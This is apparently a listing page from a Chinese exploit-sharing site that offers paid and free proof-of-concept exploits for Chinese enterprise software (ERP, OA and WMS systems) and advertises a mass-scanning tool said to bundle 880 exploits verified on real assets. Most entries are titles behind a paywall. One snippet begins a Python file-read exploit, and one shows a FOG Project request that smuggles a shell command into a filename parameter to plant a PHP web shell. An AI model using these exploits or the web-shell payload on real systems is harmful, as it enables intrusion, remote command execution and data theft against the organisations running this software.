POC_秃兔安全

更新

浏览

【2025特殊通用】飞企互联FE remoteServlet RCE

fofa语句pocyaml已验证

付费阅读500 # poc

dreamer29210个月前

01067

【通用】顺景ERP TMScmQuoteGetFile 任意文件读取

fofa语句yakit插件 uuidpoc yakit yamlnuclei yaml已验证

付费阅读500 # poc # yakit # nuclei

dreamer2922年前

010615

【通用】时空WMS-仓储精细化管理系统 SaveCrash.ashx 文件上传

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证

付费阅读500 # poc # yakit # nuclei

dreamer2922年前

010515

蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入

2024你懂的

秃兔2年前

010515

dadd 最新版v4.1.0 发布

dadd包含本站点所有poc聚合在一起的快速打点工具新增指纹以及880个poc和敏感信息检测模版本工具为内部工具，持续更新，每一个poc都经过真实资产验证，确保poc的准确性。下载地址

付费阅读9999 # dadd

dreamer29211个月前

01056

科荣 AIO 管理系统任意文件读取

import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容

2024你懂的

秃兔2年前

01058

用友NC任意文件读取

2024你懂的

秃兔2年前

01056

致远 OA fileUpload.do 前台文件上传绕过漏洞

2024你懂的

秃兔2年前

01055

蓝凌 EKP sys-common远程代码执行漏洞

2024你懂的

秃兔2年前

01057

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...

2024你懂的

秃兔2年前

01045

上一页 1…30 313233 34…55 下一页跳转